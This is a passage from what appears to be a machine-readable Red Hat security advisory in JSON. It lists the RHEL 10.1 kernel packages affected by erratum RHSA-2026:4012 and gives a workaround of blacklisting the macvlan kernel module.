"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4012"
},
{
"category": "workaround",
"details": "To mitigate this issue, prevent module macvlan from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically.",
"product_ids": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
